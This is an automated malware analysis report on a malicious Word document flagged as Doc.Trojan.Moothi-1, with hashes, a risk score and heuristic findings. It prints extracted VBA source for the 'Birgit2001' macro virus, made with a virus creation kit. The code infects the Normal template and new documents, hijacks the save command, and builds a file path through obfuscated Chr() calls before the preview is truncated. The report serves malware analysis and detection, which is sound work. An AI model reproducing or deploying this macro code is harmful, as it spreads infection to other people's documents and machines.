Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 069282f23e27e823…

MALICIOUS

Office (OLE)

59.5 KB Created: 2000-09-09 11:42:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: e0742152c195158fedd080a7197be13e SHA-1: c5c9f7b9a55db942d0c7148a61306df51a53cd33 SHA-256: 069282f23e27e8233032231726e5d22c86dd50f1de256c4017fbc18bebeb02cc
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Moothi-1'. Static analysis revealed the presence of VBA macros within the document. These macros are highly likely to be responsible for downloading and executing a secondary malicious payload, a common tactic for this type of threat.

Heuristics 2

  • ClamAV: Doc.Trojan.Moothi-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Moothi-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23897 bytes
SHA-256: 3993c346e52e1e5b256a785b587cffd636e7b9a2d8fbe01391f2c95cd6df12d8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'   __   __
'  |  | |  |
' _|__|_|__|_   ____      ____   _________   _________   _________   ____   ____   ___   ________
'/           \ /    \    /    \ /         \ /         \ /         \ /    \ /    \ /   \ /        \
'|   ________| |     \  /     | |   ___   | |   ___   | |         | |    | |    | |   | |   _____/
'|  |          |      \/      | |  /   \  | |  /   \  | |         | |    | |    | \___/ |   |
'|  |________  |              | |  |   |  | |  |   |  | |__     __| |    |_|    |  ___  |   |__
'|           \ |              | |  |   |  | |  |   |  |    |   |    |           | |   | |      |
'|______     | |    |\  /|    | |  |   |  | |  |   |  |    |   |    |     _     | |   | |    __|
'       |    | |    | \/ |    | |  |   |  | |  |   |  |    |   |    |    | |    | |   | |   |
' ______|    | |    |    |    | |  \___/  | |  \___/  |    |   |    |    | |    | |   | |   |____
'|           | |    |    |    | |         | |         |    |   |    |    | |    | |   | |        \
'\___________/ \____/    \____/ \_________/ \_________/    \___/    \____/ \____/ \___/ \________/
'  |  | |  |                                                - $MOOTHiE Da HuStla [ZeroGravity]
'  |__| |__|                                                - August 15, 2000
'
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*

'Virus Creation: 09/09/00 13.39.36
$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'$*  Poly       = Yes           $*
'$*  Retro      = Yes           $*
'$*  Stealth    = High          $*
'$*  Infection  = New           $*
'$*  Payload    = Save          $*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$

|-----====== CODE Starts ======-----|

Private Sub Document_New()
On Error Resume Next
Call Poly1
'Author:   Doctor Rave
'Name:     Birgit2001
'Comments: This is not a troja
'Origin:   Germany
'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0

On Error Resume Next: Randomize
Dim XXX1 As Object, XXX2 As Object, XXX3 As Object, XXX4 As Object, XXX5 As Object
Dim YYY1 As Object, YYY2 As Object, YYY3 As Object, YYY4 As Object, YYY5 As Object
Set XXX1 = ActiveDocument: Set XXX2 = XXX1.VBProject: Set XXX3 = XXX2.VBComponents: Set XXX4 = XXX3.Item(1): Set XXX5 = XXX4.CodeModule
Set YYY1 = NormalTemplate: Set YYY2 = YYY1.VBProject: Set YYY3 = YYY2.VBComponents: Set YYY4 = YYY3.Item(1): Set YYY5 = YYY4.CodeModule

AAA = YYY5.CountOfLines: BBB = XXX5.CountOfLines: CCC = Chr(Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65): Chr (Int(Rnd * 25) + 65)

If AAA < BBB Then
For XXX = 1 To AAA: NT5.replaceline XXX, CCC: Next XXX
For XXX = 1 To BBB: XXXA = XXX5.Lines(XXX, 1): YYY5.Insertlines XXX, XXXA: Next XXX
NormalTemplate.Save: End If


If BBB < AAA Then
For XXX = 1 To BBB: XXX5.replaceline XXX, CCC: Next XXX
For XXX = 1 To AAA: XXXA = YYY5.Lines(XXX, 1): XXX5.Insertlines XXX, XXXA: Next XXX
ActiveDocument.Save: End If
Call Retro
End Sub

Sub FileSave()
On Error Resume Next
MsgBox "You have been infected by the Birgit2001 virus!"
ActiveDocument.Save 'Actual Save Command
End Sub


Private Sub Retro()
On Error Resume Next: h$ = Chr(99) & Chr(58) & Chr(92) & Chr(97) & Chr(117) & Chr(116) & Chr(111) & Chr(101) & Chr(
... (truncated)